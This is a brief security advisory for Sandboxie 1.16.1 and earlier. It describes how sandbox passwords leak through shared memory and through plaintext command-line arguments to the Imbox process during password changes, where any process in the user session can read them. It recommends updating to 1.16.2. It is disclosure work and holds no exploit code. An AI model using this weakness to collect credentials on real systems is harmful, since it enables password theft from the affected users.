Name of the Vulnerable Software and Affected Versions:

Sandboxie versions 1.16.1 and earlier

Description:

Sandboxie is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. A critical security vulnerability exists in password handling mechanisms. During encrypted sandbox creation, user passwords are transmitted via shared memory, potentially exposing them to interception. The vulnerability is particularly severe during password modification operations, where both old and new passwords are passed as plaintext command-line arguments to the `Imbox` process without encryption or obfuscation. This allows any process within the user session, including unprivileged processes, to retrieve these sensitive credentials by reading the command-line arguments, bypassing standard privilege requirements.

Recommendations:

Update to Sandboxie version 1.16.2 or later.